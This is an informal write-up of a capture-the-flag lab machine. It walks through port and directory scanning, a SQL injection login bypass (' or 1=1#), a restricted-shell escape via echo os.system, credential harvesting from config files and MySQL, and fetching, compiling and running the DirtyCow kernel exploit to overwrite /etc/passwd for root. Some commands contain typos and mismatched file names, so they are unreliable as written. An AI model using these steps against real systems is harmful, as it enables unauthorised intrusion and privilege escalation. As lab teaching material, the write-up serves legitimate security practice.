let’s start with the machine
first download the machine form the url then setup your machine at virtual box and now enumerate it use virtual environment network so that it will get a dynamic ip itself
and for knowing the ip use
netdiscover -i vboxnet0 MACHINE IP — 192.168.56.103
lets start with nmap
after having the NMAP SACN
visiting http and found that there is a member login page
after using default creds we didn’t get in
so let’s go for gobuster to search for available directory
gobuster -w location-of-wordlist -u url
lets visit these directory’s
after visiting these directory we find .php files but these are not useful because they are again redirecting us to login page “http://192.168.56.103/index.php”
so what’s now , after seeing the gobuster result we know that there are two users john and robert , so what if we login the index.php page with these usernames….
and after using username robert and using mysql stings on password to bypass login page
username — robertpassword — ‘ or 1=1#
BINGOOOO!!!!!!! we got password for robert
at NMAP scan we observed that the SSH port was open let’s try to move in using these credentials
but again we see that we are not having a proper interactive shell as we can see that
after using “ ? ” we see that we are having permission to use echo so let’s see how we can use a interactive shell using echo command
so we got our interactive shell using
echo os.system(“/bin/bash”)and now we search for some credentials because mysql port was open so what if we got credentials to move in and so after searching for config files i moved to /var/html directory there we found john directory and john.php is having root login information of mysql service
here we get to see that mysql can be logged in with root user without any authentication so let’s check what’s it’s having
using {mysql -u root -p }we got databases of member and then there we found info of user’s account with there password
and now we are having info of john user so let’s switch to john using it’s password , and now we are in the john user
username — john password — MyNameIsJohn
again for getting a proper interactive shell we use
echo os.system(“/bin/bash”)after logging in
let’s see is the kernel vulnerable or not using
uname -a here we see that the kernel of system is vulnerable with dirtycow (click the dirtycow to get dirtycow script)
so let’s share our dirtycow.c to target pc using python server using
python -m SimpleHTTPServer 80NOTE :- use above command at your local host and the start this server at the directory where you are having dirtycow.c file
and lets get the file at our target pc using
wget http://192.168.56.1/dirtycow.c .and then compile dirtycow.c using
gcc -pthread dirty.c -o dirty -lcryt (now run)
./dirtycow
before moving ahead let’s see what dirtycow does?
it automatically generates a new passwd line and The user will be prompted for the new password when the binary is run.
The original /etc/passwd file is then backed up to /tmp/passwd.bak
and overwrites the root account with the generated line.
After running the exploit you should be able to login with the newly created user.and see what we got
hence we got root shell
thank you :)
